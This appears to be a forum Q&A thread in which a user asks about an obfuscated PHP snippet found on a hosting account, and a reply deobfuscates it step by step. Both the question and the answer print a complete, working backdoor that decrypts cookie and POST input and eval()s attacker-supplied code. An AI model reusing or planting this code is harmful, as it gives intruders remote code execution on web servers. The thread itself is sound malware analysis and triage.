drhg24275 2018-06-11 11:10

这个恶意代码是什么?

I found this code on a hosting account; it appears to have been written by a hacker. What is this code for?

<?php /* NOTE(review): obfuscated PHP backdoor, not part of any legitimate hosting stack. $zbsdho is only a character alphabet; every entry of $ivlmhe is a function name or constant string assembled from single characters of it (resolved: "H*", the fixed string "9dae5f74-85e2-4455-bb08-08decc38c57c", "#", "count", "str_repeat", "explode", "substr", "array_merge", "strlen", "pack"), so no suspicious identifier appears literally in the file. The loop then hex-decodes every cookie/POST value (pack "H*"), XORs it with a keystream built from the parameter name plus the fixed string, splits the result on "#", and when the part count is a multiple of three calls the function named in part [1] with part [2] as argument and eval()s whatever that returns before exit(). For triage, the fixed string above is a reliable grep/log signature; any file containing it belongs to the same compromise. */ $zbsdho = '49y87v3bktgmrfc#ueo\'5anpdi-0_ls2*xH';$ivlmhe = Array();$ivlmhe[] = $zbsdho[34].$zbsdho[32];$ivlmhe[] = $zbsdho[1].$zbsdho[24].$zbsdho[21].$zbsdho[17].$zbsdho[20].$zbsdho[13].$zbsdho[4].$zbsdho[0].$zbsdho[26].$zbsdho[3].$zbsdho[20].$zbsdho[17].$zbsdho[31].$zbsdho[26].$zbsdho[0].$zbsdho[0].$zbsdho[20].$zbsdho[20].$zbsdho[26].$zbsdho[7].$zbsdho[7].$zbsdho[27].$zbsdho[3].$zbsdho[26].$zbsdho[27].$zbsdho[3].$zbsdho[24].$zbsdho[17].$zbsdho[14].$zbsdho[14].$zbsdho[6].$zbsdho[3].$zbsdho[14].$zbsdho[20].$zbsdho[4].$zbsdho[14];$ivlmhe[] = $zbsdho[15];$ivlmhe[] = $zbsdho[14].$zbsdho[18].$zbsdho[16].$zbsdho[22].$zbsdho[9];$ivlmhe[] = $zbsdho[30].$zbsdho[9].$zbsdho[12].$zbsdho[28].$zbsdho[12].$zbsdho[17].$zbsdho[23].$zbsdho[17].$zbsdho[21].$zbsdho[9];$ivlmhe[] = $zbsdho[17].$zbsdho[33].$zbsdho[23].$zbsdho[29].$zbsdho[18].$zbsdho[24].$zbsdho[17];$ivlmhe[] = $zbsdho[30].$zbsdho[16].$zbsdho[7].$zbsdho[30].$zbsdho[9].$zbsdho[12];$ivlmhe[] = $zbsdho[21].$zbsdho[12].$zbsdho[12].$zbsdho[21].$zbsdho[2].$zbsdho[28].$zbsdho[11].$zbsdho[17].$zbsdho[12].$zbsdho[10].$zbsdho[17];$ivlmhe[] = $zbsdho[30].$zbsdho[9].$zbsdho[12].$zbsdho[29].$zbsdho[17].$zbsdho[22];$ivlmhe[] = $zbsdho[23].$zbsdho[21].$zbsdho[14].$zbsdho[8];foreach ($ivlmhe[7]($_COOKIE, $_POST) as $owoafjz => $nunarwf){function ogehexx($ivlmhe, $owoafjz, $oibsdj){return $ivlmhe[6]($ivlmhe[4]($owoafjz . $ivlmhe[1], ($oibsdj / $ivlmhe[8]($owoafjz)) + 1), 0, $oibsdj);}function lxasj($ivlmhe, $arihtmu){return @$ivlmhe[9]($ivlmhe[0], $arihtmu);}function jxlby($ivlmhe, $arihtmu){$flgqwzt = $ivlmhe[3]($arihtmu) % 3;if (!$flgqwzt) {eval($arihtmu[1]($arihtmu[2]));exit();}}$nunarwf = lxasj($ivlmhe, $nunarwf);jxlby($ivlmhe, $ivlmhe[5]($ivlmhe[2], $nunarwf ^ ogehexx($ivlmhe, $owoafjz, $ivlmhe[8]($nunarwf))));}


  • dtv55860 2018-06-11 11:20

First, start by beautifying the code:

    <?php
    // NOTE(review): this is a PHP backdoor (a remote-code-execution loader), not hosting code.
    // $zbsdho is only an alphabet; every entry of $ivlmhe below is a string assembled from
    // single characters of it, so no function name appears literally in the file (defeats
    // naive grep/signature scanning). Resolved values, by index:
    //   0 "H*"   1 "9dae5f74-85e2-4455-bb08-08decc38c57c"   2 "#"   3 "count"   4 "str_repeat"
    //   5 "explode"   6 "substr"   7 "array_merge"   8 "strlen"   9 "pack"
    // Triage: the fixed string at index 1 is hard-coded and specific enough to grep the whole
    // document root and the web logs for; treat every file containing it as part of the same
    // compromise, and assume anything reachable from this account (credentials, DB) is exposed.
    $zbsdho   = '49y87v3bktgmrfc#ueo\'5anpdi-0_ls2*xH';
    $ivlmhe   = Array();
    $ivlmhe[] = $zbsdho[34] . $zbsdho[32];  // "H*": pack() format, hex text -> raw bytes
    $ivlmhe[] = $zbsdho[1] . $zbsdho[24] . $zbsdho[21] . $zbsdho[17] . $zbsdho[20] . $zbsdho[13] . $zbsdho[4] . $zbsdho[0] . $zbsdho[26] . $zbsdho[3] . $zbsdho[20] . $zbsdho[17] . $zbsdho[31] . $zbsdho[26] . $zbsdho[0] . $zbsdho[0] . $zbsdho[20] . $zbsdho[20] . $zbsdho[26] . $zbsdho[7] . $zbsdho[7] . $zbsdho[27] . $zbsdho[3] . $zbsdho[26] . $zbsdho[27] . $zbsdho[3] . $zbsdho[24] . $zbsdho[17] . $zbsdho[14] . $zbsdho[14] . $zbsdho[6] . $zbsdho[3] . $zbsdho[14] . $zbsdho[20] . $zbsdho[4] . $zbsdho[14];  // fixed UUID-shaped string, the secret part of the XOR key
    $ivlmhe[] = $zbsdho[15];  // "#": field separator inside the decoded payload
    $ivlmhe[] = $zbsdho[14] . $zbsdho[18] . $zbsdho[16] . $zbsdho[22] . $zbsdho[9];  // "count"
    $ivlmhe[] = $zbsdho[30] . $zbsdho[9] . $zbsdho[12] . $zbsdho[28] . $zbsdho[12] . $zbsdho[17] . $zbsdho[23] . $zbsdho[17] . $zbsdho[21] . $zbsdho[9];  // "str_repeat"
    $ivlmhe[] = $zbsdho[17] . $zbsdho[33] . $zbsdho[23] . $zbsdho[29] . $zbsdho[18] . $zbsdho[24] . $zbsdho[17];  // "explode"
    $ivlmhe[] = $zbsdho[30] . $zbsdho[16] . $zbsdho[7] . $zbsdho[30] . $zbsdho[9] . $zbsdho[12];  // "substr"
    $ivlmhe[] = $zbsdho[21] . $zbsdho[12] . $zbsdho[12] . $zbsdho[21] . $zbsdho[2] . $zbsdho[28] . $zbsdho[11] . $zbsdho[17] . $zbsdho[12] . $zbsdho[10] . $zbsdho[17];  // "array_merge"
    $ivlmhe[] = $zbsdho[30] . $zbsdho[9] . $zbsdho[12] . $zbsdho[29] . $zbsdho[17] . $zbsdho[22];  // "strlen"
    $ivlmhe[] = $zbsdho[23] . $zbsdho[21] . $zbsdho[14] . $zbsdho[8];  // "pack"
    // Every request parameter is a candidate payload: cookies first, then POST fields
    // (for a string key present in both, array_merge keeps the POST value).
    foreach ($ivlmhe[7]($_COOKIE, $_POST) as $owoafjz => $nunarwf) {
        // Keystream generator: substr(str_repeat($name . <fixed string>, ...), 0, $oibsdj).
        // The key is the parameter name followed by the fixed string, repeated and cut to
        // $oibsdj bytes, so the same ciphertext decodes differently under another name.
        function ogehexx($ivlmhe, $owoafjz, $oibsdj)
        {
            return $ivlmhe[6]($ivlmhe[4]($owoafjz . $ivlmhe[1], ($oibsdj / $ivlmhe[8]($owoafjz)) + 1), 0, $oibsdj);
        }
        // pack("H*", $value): hex-decode the parameter value. The @ hides the warning pack()
        // raises on non-hex input, so ordinary cookies and form fields fail silently.
        function lxasj($ivlmhe, $arihtmu)
        {
            return @$ivlmhe[9]($ivlmhe[0], $arihtmu);
        }
        // Trigger check on the decoded, "#"-split payload: when the number of parts is a
        // multiple of three, call the function named in part [1] with part [2] as its only
        // argument, eval() the string it returns as PHP, and end the request. Part [0] is
        // never read here.
        function jxlby($ivlmhe, $arihtmu)
        {
            $flgqwzt = $ivlmhe[3]($arihtmu) % 3;
            if (!$flgqwzt) {
                eval($arihtmu[1]($arihtmu[2]));
                exit();
            }
        }
        // Pipeline per parameter: hex-decode, XOR byte-wise with a keystream of equal length
        // (PHP's string ^ string), split on "#", test the trigger.
        // Because the three functions are declared inside the loop body, a second iteration
        // hits "Cannot redeclare function" and aborts the request, so in practice only the
        // first merged parameter is ever examined unless it already reached eval()/exit().
        $nunarwf = lxasj($ivlmhe, $nunarwf);
        jxlby($ivlmhe, $ivlmhe[5]($ivlmhe[2], $nunarwf ^ ogehexx($ivlmhe, $owoafjz, $ivlmhe[8]($nunarwf))));
    }
    

    Then we find the values located in $ivlmhe:

    array(10) { 
    [0]=> string(2) "H*" 
    [1]=> string(36) "9dae5f74-85e2-4455-bb08-08decc38c57c" 
    [2]=> string(1) "#" 
    [3]=> string(5) "count" 
    [4]=> string(10) "str_repeat" 
    [5]=> string(7) "explode" 
    [6]=> string(6) "substr" 
    [7]=> string(11) "array_merge" 
    [8]=> string(6) "strlen" 
    [9]=> string(4) "pack" 
    }
    

    Then:

    // Deobfuscated loop of the backdoor. Each cookie/POST parameter (POST wins on a shared
    // string key) is hex-decoded, XOR-decrypted with a key derived from its own name plus the
    // hard-coded "9dae5f74-85e2-4455-bb08-08decc38c57c" string, split on "#", and, if the
    // part count is a multiple of three, part [1] is called as a function on part [2] and the
    // result is eval()ed. The hard-coded string is a good grep/log signature for this infection.
    foreach (array_merge($_COOKIE, $_POST) as $key => $value) {
        // Keystream: ($key . fixed string) repeated enough times, then truncated to $oibsdj bytes.
        function ogehexx($ivlmhe, $key, $oibsdj)
        {
            return substr(str_repeat($key . "9dae5f74-85e2-4455-bb08-08decc38c57c", ($oibsdj / strlen($key)) + 1), 0, $oibsdj);
        }
        // Hex text -> raw bytes; @ silences pack()'s warning for values that are not hex.
        function lxasj($ivlmhe, $arihtmu)
        {
            return @pack("H*", $arihtmu);
        }
        // Trigger: parts % 3 == 0 -> eval(<part[1]>(<part[2]>)) then exit(). Part [0] is unused.
        function jxlby($ivlmhe, $arihtmu)
        {
            $flgqwzt = count($arihtmu) % 3;
            if (!$flgqwzt) {
                eval($arihtmu[1]($arihtmu[2]));
                exit();
            }
        }
        // "^" on two strings is a byte-wise XOR; the keystream is cut to strlen($value), so the
        // whole decoded value is covered. Note the functions are declared inside the loop, so a
        // second iteration is a "Cannot redeclare function" fatal error: only the first
        // parameter is effectively processed unless it already triggered eval()/exit().
        $value = lxasj($ivlmhe, $value);
        jxlby($ivlmhe, explode("#", $value ^ ogehexx($ivlmhe, $key, strlen($value))));
    }
    

    That's all I've been able to decode so far: they are interested in the $_COOKIE and $_POST variables and run several functions over them.

    I made an error in the jxlby function originally; I have changed it to what it should be. The eval() within this function is the nasty part, but I am finding it very difficult to figure out exactly what is being evaluated, as the input to this function, $arihtmu, comes from this line, which has a bitwise XOR operator in it: explode("#", $value ^ ogehexx($ivlmhe, $key, strlen($value)))

